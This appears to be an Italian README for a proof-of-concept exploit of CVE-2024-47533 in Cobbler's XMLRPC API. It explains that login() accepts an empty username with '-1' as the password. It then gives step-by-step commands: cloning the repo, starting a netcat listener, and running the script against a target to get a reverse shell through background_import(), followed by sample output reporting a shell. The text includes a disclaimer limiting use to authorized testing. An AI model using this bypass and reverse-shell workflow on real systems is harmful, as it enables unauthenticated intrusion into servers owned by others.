
Exploit proof-of-concept per CVE-2024-47533, un bypass dell'autenticazione nell'API XMLRPC di Cobbler che porta a esecuzione di codice remoto non autenticata e reverse shell.
Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2024-47533,
un bypass critico dell'autenticazione nell'API XMLRPC di Cobbler che porta a esecuzione remota di codice (RCE) non autenticata.
L'exploit sfrutta il difetto del metodo login() dell'API XMLRPC per bypassare l'autenticazione e iniettare un comando di reverse shell tramite background_import().
Questo strumento è destinato solo a fini educativi, di ricerca e test di penetrazione autorizzati.
NON utilizzarlo su sistemi di cui non sei proprietario o per cui non hai esplicita autorizzazione scritta.
L'autore non si assume alcuna responsabilità per uso improprio o danni.
Causa principale:
utils.get_shared_secret() restituisce erroneamente -1 a causa di una gestione errata delle letture di file in modalità binaria con una codifica, consentendo l'autenticazione con un nome utente vuoto e -1 come password.
Impatto:
Un attaccante può:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
Sulla tua macchina attaccante:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Esempio:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Script exploit reverse shell
└── README.md # Documentazione
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connessione a Cobbler...
[*] Autenticazione...
[*] Esecuzione exploit...
[+] Exploit inviato! Shell ottenuta 🔥.
00xCanelo
Profilo GitHub